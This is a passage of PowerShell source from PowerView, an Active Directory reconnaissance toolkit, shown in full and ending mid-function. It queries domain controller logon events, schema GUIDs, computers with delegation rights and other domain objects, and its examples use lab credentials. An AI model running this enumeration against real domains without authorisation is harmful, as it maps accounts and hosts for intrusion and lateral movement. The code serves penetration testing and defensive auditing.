Default of [DateTime]::Now.
.PARAMETER MaxEvents
The maximum number of events to retrieve. Default of 5000.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target computer.
.EXAMPLE
Get-DomainUserEvent
Return logon events on the local machine.
.EXAMPLE
Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3))
Return all logon events from the last 3 days from every domain controller in the current domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000
Return a max of 1000 logon events from the specified machine using the specified alternate credentials.
.OUTPUTS
PowerView.LogonEvent
PowerView.ExplicitCredentialLogonEvent
.LINK
http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.LogonEvent')]
[OutputType('PowerView.ExplicitCredentialLogonEvent')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('dnshostname', 'HostName', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = $Env:COMPUTERNAME,
[ValidateNotNullOrEmpty()]
[DateTime]
$StartTime = [DateTime]::Now.AddDays(-1),
[ValidateNotNullOrEmpty()]
[DateTime]
$EndTime = [DateTime]::Now,
[ValidateRange(1, 1000000)]
[Int]
$MaxEvents = 5000,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
# the XML filter we're passing to Get-WinEvent
$XPathFilter = @"
<QueryList>
<Query Id="0" Path="Security">
<!-- Logon events -->
<Select Path="Security">
*[
System[
Provider[
@Name='Microsoft-Windows-Security-Auditing'
]
and (Level=4 or Level=0) and (EventID=4624)
and TimeCreated[
@SystemTime&gt;='$($StartTime.ToUniversalTime().ToString('s'))' and @SystemTime&lt;='$($EndTime.ToUniversalTime().ToString('s'))'
]
]
]
and
*[EventData[Data[@Name='TargetUserName'] != 'ANONYMOUS LOGON']]
</Select>
<!-- Logon with explicit credential events -->
<Select Path="Security">
*[
System[
Provider[
@Name='Microsoft-Windows-Security-Auditing'
]
and (Level=4 or Level=0) and (EventID=4648)
and TimeCreated[
@SystemTime&gt;='$($StartTime.ToUniversalTime().ToString('s'))' and @SystemTime&lt;='$($EndTime.ToUniversalTime().ToString('s'))'
]
]
]
</Select>
<Suppress Path="Security">
*[
System[
Provider[
@Name='Microsoft-Windows-Security-Auditing'
]
and
(Level=4 or Level=0) and (EventID=4624 or EventID=4625 or EventID=4634)
]
]
and
*[
EventData[
(
(Data[@Name='LogonType']='5' or Data[@Name='LogonType']='0')
or
Data[@Name='TargetUserName']='ANONYMOUS LOGON'
or
Data[@Name='TargetUserSID']='S-1-5-18'
)
]
]
</Suppress>
</Query>
</QueryList>
"@
$EventArguments = @{
'FilterXPath' = $XPathFilter
'LogName' = 'Security'
'MaxEvents' = $MaxEvents
}
if ($PSBoundParameters['Credential']) { $EventArguments['Credential'] = $Credential }
}
PROCESS {
ForEach ($Computer in $ComputerName) {
$EventArguments['ComputerName'] = $Computer
Get-WinEvent @EventArguments| ForEach-Object {
$Event = $_
$Properties = $Event.Properties
Switch ($Event.Id) {
# logon event
4624 {
# skip computer logons, for now...
if(-not $Properties[5].Value.EndsWith('$')) {
$Output = New-Object PSObject -Property @{
ComputerName = $Computer
TimeCreated = $Event.TimeCreated
EventId = $Event.Id
SubjectUserSid = $Properties[0].Value.ToString()
SubjectUserName = $Properties[1].Value
SubjectDomainName = $Properties[2].Value
SubjectLogonId = $Properties[3].Value
TargetUserSid = $Properties[4].Value.ToString()
TargetUserName = $Properties[5].Value
TargetDomainName = $Properties[6].Value
TargetLogonId = $Properties[7].Value
LogonType = $Properties[8].Value
LogonProcessName = $Properties[9].Value
AuthenticationPackageName = $Properties[10].Value
WorkstationName = $Properties[11].Value
LogonGuid = $Properties[12].Value
TransmittedServices = $Properties[13].Value
LmPackageName = $Properties[14].Value
KeyLength = $Properties[15].Value
ProcessId = $Properties[16].Value
ProcessName = $Properties[17].Value
IpAddress = $Properties[18].Value
IpPort = $Properties[19].Value
ImpersonationLevel = $Properties[20].Value
RestrictedAdminMode = $Properties[21].Value
TargetOutboundUserName = $Properties[22].Value
TargetOutboundDomainName = $Properties[23].Value
VirtualAccount = $Properties[24].Value
TargetLinkedLogonId = $Properties[25].Value
ElevatedToken = $Properties[26].Value
}
$Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonEvent')
$Output
}
}
# logon with explicit credential
4648 {
# skip computer logons, for now...
if((-not $Properties[5].Value.EndsWith('$')) -and ($Properties[11].Value -match 'taskhost\.exe')) {
$Output = New-Object PSObject -Property @{
ComputerName = $Computer
TimeCreated = $Event.TimeCreated
EventId = $Event.Id
SubjectUserSid = $Properties[0].Value.ToString()
SubjectUserName = $Properties[1].Value
SubjectDomainName = $Properties[2].Value
SubjectLogonId = $Properties[3].Value
LogonGuid = $Properties[4].Value.ToString()
TargetUserName = $Properties[5].Value
TargetDomainName = $Properties[6].Value
TargetLogonGuid = $Properties[7].Value
TargetServerName = $Properties[8].Value
TargetInfo = $Properties[9].Value
ProcessId = $Properties[10].Value
ProcessName = $Properties[11].Value
IpAddress = $Properties[12].Value
IpPort = $Properties[13].Value
}
$Output.PSObject.TypeNames.Insert(0, 'PowerView.ExplicitCredentialLogonEvent')
$Output
}
}
default {
Write-Warning "No handler exists for event ID: $($Event.Id)"
}
}
}
}
}
}
function Get-DomainGUIDMap {
<#
.SYNOPSIS
Helper to build a hash table of [GUID] -> resolved names for the current or specified Domain.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Get-Forest
.DESCRIPTION
Searches the forest schema location (CN=Schema,CN=Configuration,DC=testlab,DC=local) for
all objects with schemaIDGUID set and translates the GUIDs discovered to human-readable names.
Then searches the extended rights location (CN=Extended-Rights,CN=Configuration,DC=testlab,DC=local)
for objects where objectClass=controlAccessRight, translating the GUIDs again.
Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.OUTPUTS
Hashtable
Ouputs a hashtable containing a GUID -> Readable Name mapping.
.LINK
http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType([Hashtable])]
[CmdletBinding()]
Param (
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
$GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'}
$ForestArguments = @{}
if ($PSBoundParameters['Credential']) { $ForestArguments['Credential'] = $Credential }
try {
$SchemaPath = (Get-Forest @ForestArguments).schema.name
}
catch {
throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest'
}
if (-not $SchemaPath) {
throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest'
}
$SearcherArguments = @{
'SearchBase' = $SchemaPath
'LDAPFilter' = '(schemaIDGUID=*)'
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$SchemaSearcher = Get-DomainSearcher @SearcherArguments
if ($SchemaSearcher) {
try {
$Results = $SchemaSearcher.FindAll()
$Results | Where-Object {$_} | ForEach-Object {
$GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0]
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_"
}
}
$SchemaSearcher.dispose()
}
catch {
Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_"
}
}
$SearcherArguments['SearchBase'] = $SchemaPath.replace('Schema','Extended-Rights')
$SearcherArguments['LDAPFilter'] = '(objectClass=controlAccessRight)'
$RightsSearcher = Get-DomainSearcher @SearcherArguments
if ($RightsSearcher) {
try {
$Results = $RightsSearcher.FindAll()
$Results | Where-Object {$_} | ForEach-Object {
$GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0]
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_"
}
}
$RightsSearcher.dispose()
}
catch {
Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_"
}
}
$GUIDs
}
function Get-DomainComputer {
<#
.SYNOPSIS
Return all computers or specific computer objects in AD.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
.DESCRIPTION
Builds a directory searcher object using Get-DomainSearcher, builds a custom
LDAP filter based on targeting/filter parameters, and searches for all objects
matching the criteria. To only return specific properties, use
"-Properties samaccountname,usnchanged,...". By default, all computer objects for
the current domain are returned.
.PARAMETER Identity
A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
or a dns host name (e.g. windows10.testlab.local). Wildcards accepted.
.PARAMETER UACFilter
Dynamic parameter that accepts one or more values from $UACEnum, including
"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'.
.PARAMETER Unconstrained
Switch. Return computer objects that have unconstrained delegation.
.PARAMETER TrustedToAuth
Switch. Return computer objects that are trusted to authenticate for other principals.
.PARAMETER Printers
Switch. Return only printers.
.PARAMETER SPN
Return computers with a specific service principal name, wildcards accepted.
.PARAMETER OperatingSystem
Return computers with a specific operating system, wildcards accepted.
.PARAMETER ServicePack
Return computers with a specific service pack, wildcards accepted.
.PARAMETER SiteName
Return computers in the specific AD Site name, wildcards accepted.
.PARAMETER Ping
Switch. Ping each host to ensure it's up before enumerating.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.PARAMETER Raw
Switch. Return raw results instead of translating the fields into a custom PSObject.
.EXAMPLE
Get-DomainComputer
Returns the current computers in current domain.
.EXAMPLE
Get-DomainComputer -SPN mssql* -Domain testlab.local
Returns all MS SQL servers in the testlab.local domain.
.EXAMPLE
Get-DomainComputer -UACFilter TRUSTED_FOR_DELEGATION,SERVER_TRUST_ACCOUNT -Properties dnshostname
Return the dns hostnames of servers trusted for delegation.
.EXAMPLE
Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained
Search the specified OU for computeres that allow unconstrained delegation.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainComputer -Credential $Cred
.OUTPUTS
PowerView.Computer
Custom PSObject with translated computer property fields.
PowerView.Computer.Raw
The raw DirectoryServices.SearchResult object, if -Raw is enabled.
#>
[OutputType('PowerView.Computer')]
[OutputType('PowerView.Computer.Raw')]
[CmdletBinding()]
Param (
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('SamAccountName', 'Name', 'DNSHostName')]
[String[]]
$Identity,
[Switch]
$Unconstrained,
[Switch]
$TrustedToAuth,
[Switch]
$Printers,
[ValidateNotNullOrEmpty()]
[Alias('ServicePrincipalName')]
[String]
$SPN,
[ValidateNotNullOrEmpty()]
[String]
$OperatingSystem,
[ValidateNotNullOrEmpty()]
[String]
$ServicePack,
[ValidateNotNullOrEmpty()]
[String]
$SiteName,
[Switch]
$Ping,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
DynamicParam {
$UACValueNames = [Enum]::GetNames($UACEnum)
# add in the negations
$UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"}
# create new dynamic parameter
New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])
}
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$CompSearcher = Get-DomainSearcher @SearcherArguments
}
PROCESS {
#bind dynamic parameter to a friendly variable
if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {
New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters
}
if ($CompSearcher) {
$IdentityFilter = ''
$Filter = ''
$Identity | Where-Object {$_} | ForEach-Object {
$IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
if ($IdentityInstance -match '^S-1-') {
$IdentityFilter += "(objectsid=$IdentityInstance)"
}
elseif ($IdentityInstance -match '^CN=') {
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
# if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
# and rebuild the domain searcher
$IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
Write-Verbose "[Get-DomainComputer] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
$SearcherArguments['Domain'] = $IdentityDomain
$CompSearcher = Get-DomainSearcher @SearcherArguments
if (-not $CompSearcher) {
Write-Warning "[Get-DomainComputer] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
}
elseif ($IdentityInstance.Contains('.')) {
$IdentityFilter += "(|(name=$IdentityInstance)(dnshostname=$IdentityInstance))"
}
elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
$GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
$IdentityFilter += "(objectguid=$GuidByteString)"
}
else {
$IdentityFilter += "(name=$IdentityInstance)"
}
}
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
$Filter += "(|$IdentityFilter)"
}
if ($PSBoundParameters['Unconstrained']) {
Write-Verbose '[Get-DomainComputer] Searching for computers with for unconstrained delegation'
$Filter += '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
}
if ($PSBoundParameters['TrustedToAuth']) {
Write-Verbose '[Get-DomainComputer] Searching for computers that are trusted to authenticate for other principals'
$Filter += '(msds-allowedtodelegateto=*)'
}
if ($PSBoundParameters['Printers']) {
Write-Verbose '[Get-DomainComputer] Searching for printers'
$Filter += '(objectCategory=printQueue)'
}
if ($PSBoundParameters['SPN']) {
Write-Verbose "[Get-DomainComputer] Searching for computers with SPN: $SPN"
$Filter += "(servicePrincipalName=$SPN)"
}
if ($PSBoundParameters['OperatingSystem']) {
Write-Verbose "[Get-DomainComputer] Searching for computers with operating system: $OperatingSystem"
$Filter += "(operatingsystem=$OperatingSystem)"
}
if ($PSBoundParameters['ServicePack']) {
Write-Verbose "[Get-DomainComputer] Searching for computers with service pack: $ServicePack"
$Filter += "(operatingsystemservicepack=$ServicePack)"
}
if ($PSBoundParameters['SiteName']) {
Write-Verbose "[Get-DomainComputer] Searching for computers with site name: $SiteName"
$Filter += "(serverreferencebl=$SiteName)"
}
if ($PSBoundParameters['LDAPFilter']) {
Write-Verbose "[Get-DomainComputer] Using additional LDAP filter: $LDAPFilter"
$Filter += "$LDAPFilter"
}
# build the LDAP filter for the dynamic UAC filter value
$UACFilter | Where-Object {$_} | ForEach-Object {
if ($_ -match 'NOT_.*') {
$UACField = $_.Substring(4)
$UACValue = [Int]($UACEnum::$UACField)
$Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))"
}
else {
$UACValue = [Int]($UACEnum::$_)
$Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)"
}
}
$CompSearcher.filter = "(&(samAccountType=805306369)$Filter)"
Write-Verbose "[Get-DomainComputer] Get-DomainComputer filter string: $($CompSearcher.filter)"
if ($PSBoundParameters['FindOne']) { $Results = $CompSearcher.FindOne() }
else { $Results = $CompSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
$Up = $True
if ($PSBoundParameters['Ping']) {
$Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname
}
if ($Up) {
if ($PSBoundParameters['Raw']) {
# return raw result objects
$Computer = $_
$Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer.Raw')
}
else {
$Computer = Convert-LDAPProperty -Properties $_.Properties
$Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer')
}
$Computer
}
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainComputer] Error disposing of the Results object: $_"
}
}
$CompSearcher.dispose()
}
}
}
function Get-DomainObject {
<#
.SYNOPSIS
Return all (or specified) domain objects in AD.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName
.DESCRIPTION
Builds a directory searcher object using Get-DomainSearcher, builds a custom
LDAP filter based on targeting/filter parameters, and searches for all objects
matching the criteria. To only return specific properties, use
"-Properties samaccountname,usnchanged,...". By default, all objects for
the current domain are returned.
.PARAMETER Identity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
Wildcards accepted.
.PARAMETER UACFilter
Dynamic parameter that accepts one or more values from $UACEnum, including
"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.PARAMETER Raw
Switch. Return raw results instead of translating the fields into a custom PSObject.
.EXAMPLE
Get-DomainObject -Domain testlab.local
Return all objects for the testlab.local domain
.EXAMPLE
'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname
distinguishedname
-----------------
CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local
CN=dfm,CN=Users,DC=testlab,DC=local
OU=OU3,DC=testlab,DC=local
CN=dfm (admin),CN=Users,DC=testlab,DC=local
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainObject -Credential $Cred -Identity 'windows1'
.EXAMPLE
Get-Domain | Select-Object -Expand name
testlab.local
'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: [Get-DomainUser] Extracted domain 'testlab.local' from 'testlab\harmj0y'
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
distinguishedname
-----------------
CN=harmj0y,CN=Users,DC=testlab,DC=local
VERBOSE: [Get-DomainUser] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins)))
CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
.OUTPUTS
PowerView.ADObject
Custom PSObject with translated AD object property fields.
PowerView.ADObject.Raw
The raw DirectoryServices.SearchResult object, if -Raw is enabled.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[OutputType('PowerView.ADObject')]
[OutputType('PowerView.ADObject.Raw')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
DynamicParam {
$UACValueNames = [Enum]::GetNames($UACEnum)
# add in the negations
$UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"}
# create new dynamic parameter
New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])
}
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$ObjectSearcher = Get-DomainSearcher @SearcherArguments
}
PROCESS {
#bind dynamic parameter to a friendly variable
if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {
New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters
}
if ($ObjectSearcher) {
$IdentityFilter = ''
$Filter = ''
$Identity | Where-Object {$_} | ForEach-Object {
$IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
if ($IdentityInstance -match '^S-1-') {
$IdentityFilter += "(objectsid=$IdentityInstance)"
}
elseif ($IdentityInstance -match '^(CN|OU|DC)=') {
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
# if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
# and rebuild the domain searcher
$IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
Write-Verbose "[Get-DomainObject] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
$SearcherArguments['Domain'] = $IdentityDomain
$ObjectSearcher = Get-DomainSearcher @SearcherArguments
if (-not $ObjectSearcher) {
Write-Warning "[Get-DomainObject] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
}
elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
$GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
$IdentityFilter += "(objectguid=$GuidByteString)"
}
elseif ($IdentityInstance.Contains('\')) {
$ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
if ($ConvertedIdentityInstance) {
$ObjectDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
$ObjectName = $IdentityInstance.Split('\')[1]
$IdentityFilter += "(samAccountName=$ObjectName)"
$SearcherArguments['Domain'] = $ObjectDomain
Write-Verbose "[Get-DomainObject] Extracted domain '$ObjectDomain' from '$IdentityInstance'"
$ObjectSearcher = Get-DomainSearcher @SearcherArguments
}
}
elseif ($IdentityInstance.Contains('.')) {
$IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))"
}
else {
$IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))"
}
}
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
$Filter += "(|$IdentityFilter)"
}
if ($PSBoundParameters['LDAPFilter']) {
Write-Verbose "[Get-DomainObject] Using additional LDAP filter: $LDAPFilter"
$Filter += "$LDAPFilter"
}
# build the LDAP filter for the dynamic UAC filter value
$UACFilter | Where-Object {$_} | ForEach-Object {
